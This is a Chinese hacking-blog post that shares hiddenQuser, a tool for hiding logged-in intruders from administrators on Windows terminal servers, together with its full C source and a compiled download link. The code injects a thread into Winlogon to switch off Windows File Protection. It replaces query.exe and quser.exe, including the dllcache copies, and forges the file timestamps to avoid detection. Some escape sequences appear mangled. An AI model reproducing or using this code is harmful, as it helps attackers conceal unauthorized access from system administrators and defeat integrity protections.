hiddenQuser + 源码 's

鬼仔：query user 这个命令大家都知道吧？这个程序的作用就是替换系统目录下的Quser.exe与Query.exe，这样你登录终端后，管理员使用 query user 查看时看不到你已经登录了，但是有一点不足的就是在任务管理器中没有隐藏。

来源：精灵's Blog
执行后替换系统目录下的Quser.exe与Query.exe ,登陆过终端服务器的朋友都知道这两个工具是做啥的吧~

大家都知道，在Windows 2000和Windows XP及2003系统中有系统文件保护功能，一旦被保护的系统文件被修改了，就会弹出需要插入系统安装盘CD的对话框。所以本工具采用了黑客之门的方法,通过远程注入进程让系统文件保护暂时失效,然后执行替换的操作.执行后自动替换系统的这两个文件包括dllcache下的对应文件，让系统文件保护也无法还原系统原来的这两个文件.

没什么技术含量,在任务管理器中隐藏还不会.
程序代码：

#include #include #include #include"resource.h"  BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL, BOOL bHidden ); // = TRUE DWORD GetProcessIDFromName(char * name); BOOL DebugPrivilege(const char *PName,BOOL bEnable);  FILETIME lpCreationTime; // 文件夹的创建时间 FILETIME lpLastAccessTime; // 对文件夹的最近访问时间 FILETIME lpLastWriteTime; // 文件夹的最近修改时间  void main(int argc,char * argv[]) { char System[MAX_PATH] = {0}; char System1[MAX_PATH] = {0}; char System2[MAX_PATH] = {0}; char System3[MAX_PATH] = {0}; char System4[MAX_PATH] = {0}; char Queryexe[MAX_PATH] = {0}; char Queryexe1[MAX_PATH] = {0}; char Quserexe[MAX_PATH] = {0}; char Quserexe1[MAX_PATH] = {0}; HANDLE hFile = INVALID_HANDLE_VALUE;  printf("/n=========================================================================/n"); printf("[F.S.T] hidden Other user info when execute query.exe & quser.exe/n"); printf("Welcome to [F.S.T] Http://Www.Wrsky.com/n"); printf("Code by Sprite/n"); printf("=========================================================================/n");  GetSystemDirectory(System,MAX_PATH);  strcat(Queryexe,System); strcat(Queryexe,"//query.exe"); printf("%s/n",Queryexe);  hFile = CreateFile(Queryexe, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL );  // 获取文件夹时间属性信息 GetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);  CloseHandle(hFile);  strcat(Quserexe,System); strcat(Quserexe,"//quser.exe"); printf("%s/n",Quserexe);  strcat(Queryexe1,System); strcat(Queryexe1,"//dllcache"); strcat(Queryexe1,"//query.exe"); printf("%s/n",Queryexe1);  strcat(Quserexe1,System); strcat(Quserexe1,"//dllcache"); strcat(Quserexe1,"//quser.exe"); printf("%s/n",Quserexe1);  strcat(System1,"rename "); strcat(System1,System); strcat(System1,"//query.exe "); strcat(System1,"query1.exe");  strcat(System2,"rename "); strcat(System2,System); strcat(System2,"//quser.exe "); strcat(System2,"quser1.exe");  strcat(System3,"rename "); strcat(System3,System); strcat(System3,"//dllcache"); strcat(System3,"//query.exe "); strcat(System3,"query1.exe");  strcat(System4,"rename "); strcat(System4,System); strcat(System4,"//dllcache"); strcat(System4,"//quser.exe "); strcat(System4,"quser1.exe");  printf("%s/n",System1); printf("%s/n",System2); printf("%s/n",System3); printf("%s/n",System4);  DebugPrivilege("SeDebugPrivilege",TRUE);  /*得到进程的ID，具体的方法可以使用CreateToolHelpSnap32()，ProcessFirst32()以及ProcessNext32()得到*/  DWORD dwPid=GetProcessIDFromName("Winlogon.exe");  printf("Winlogon 's Process ID is:%d/n",dwPid);  HANDLE hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);  DWORD dwVersion;  HMODULE hSfc;  dwVersion = GetVersion();  //判断操作系统的类型  if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5)  {// Windows 2000/XP/2003  if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0) //Windows 2000  hSfc = LoadLibrary("sfc.dll");  else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 1) //Windows XP  hSfc = LoadLibrary("sfc_os.dll"); else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 2) //Windows 2003  hSfc = LoadLibrary("sfc_os.dll");  }  //得到函数的地址  FARPROC dwAddress=GetProcAddress(hSfc,MAKEINTRESOURCE(2));  DWORD dwThreadId;  HANDLE hThread;  //创建远线程  hThread =CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *) (void *))dwAddress,0,0,&dwThreadId);  WaitForSingleObject(hThread,2000l);  system(System3); system(System1); system(System4); system(System2);  if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe1,NULL,FALSE)) printf("Extract %s Success!/n",Queryexe1); else printf("Extract %s Error!/n",Queryexe1);  if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe,NULL,FALSE)) printf("Extract %s Success!/n",Queryexe); else printf("Extract %s Error!/n",Queryexe);  if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe1,NULL,FALSE)) printf("Extract %s Success!/n",Quserexe1); else printf("Extract %s Error!/n",Quserexe1);  if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe,NULL,FALSE)) printf("Extract %s Success!/n",Quserexe); else printf("Extract %s Error!/n",Quserexe); DebugPrivilege(SE_DEBUG_NAME,FALSE); CloseHandle(hThread); }  /*函数ExtractFile（导出一个自定义资源）*/ BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL, BOOL bHidden ) // = TRUE { // 如果用户没指定实例句柄，则假设在当前进程中 HMODULE hCurProc = hModule; if ( NULL == hModule ) hCurProc = GetModuleHandle(NULL); //ASSERT( hCurProc ); // find the RESOURCE_DEFINE resource data. HRSRC hResourceExeFile; hResourceExeFile = FindResource(hCurProc,szResourceName,szResourceType );  if ( ! hResourceExeFile ) { //TRACE(_T("findresource failed!!(%ld) "), GetLastError()); printf("findresource failed!!(%ld) ", GetLastError()); return FALSE; } // get size of resource DWORD dwSize = SizeofResource( (HMODULE)hCurProc, hResourceExeFile ); if ( 0 == dwSize ) { //TRACE(_T("can not get the resource size")); printf("can not get the resource size"); return FALSE; } // alloc the global memory HGLOBAL hGlobalMem = LoadResource(hCurProc, hResourceExeFile );  if ( NULL == hGlobalMem ) { //TRACE(_T("LoadResource failed! %ld"), GetLastError()); printf("LoadResource failed! %ld", GetLastError()); return FALSE; } // lock the resource LPVOID lpExe = LockResource( hGlobalMem ); //ASSERT( lpExe ); /*if (!DeleteFile(szFilePath)) { printf("删除文件失败！"); return false; }*/ // 是否隐藏 DWORD dwAttrib = FILE_ATTRIBUTE_NORMAL; if ( bHidden ) dwAttrib |= FILE_ATTRIBUTE_HIDDEN; // copy to file!!  HANDLE hFile = INVALID_HANDLE_VALUE;  hFile = CreateFile(szFilePath, GENERIC_WRITE, 0, NULL, CREATE_NEW, dwAttrib, NULL ); if ( INVALID_HANDLE_VALUE == hFile ) { //TRACE("can not open the target file (%ld) ", GetLastError()); printf("can not open the target file (%ld) ", GetLastError()); return FALSE; } DWORD dwWritten;  if ( ! WriteFile( hFile, lpExe, dwSize, &dwWritten, NULL ) ) { //TRACE(_T("can not write the target file %ld"), GetLastError()); printf("can not write the target file %ld", GetLastError()); CloseHandle( hFile ); return FALSE; } //设置文件日期 SetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);  CloseHandle( hFile ); return TRUE; }  //提升特权  BOOL DebugPrivilege(const char *PName,BOOL bEnable) { BOOL bResult = TRUE; HANDLE hToken; TOKEN_PRIVILEGES TokenPrivileges;  if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0) { printf("Fail To OpenProcess /r/n"); bResult = FALSE; return bResult; } TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid); AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL); if(GetLastError() != ERROR_SUCCESS) { printf("Fail To AddPrivilege /r/n"); bResult = FALSE; } CloseHandle(hToken);  return bResult; }  //得到进程ID  DWORD GetProcessIDFromName(char * name) { HANDLE snapshot ; PROCESSENTRY32 processinfo ; processinfo.dwSize = sizeof (processinfo) ; snapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0) ; if (snapshot == NULL) return FALSE;  BOOL status = Process32First (snapshot, &processinfo) ; while (status) { if(stricmp(name,processinfo.szExeFile)==0) return processinfo.th32ProcessID; status = Process32Next (snapshot, &processinfo); } return -1; }

编译好的程序下载：
hiddenQuser.rar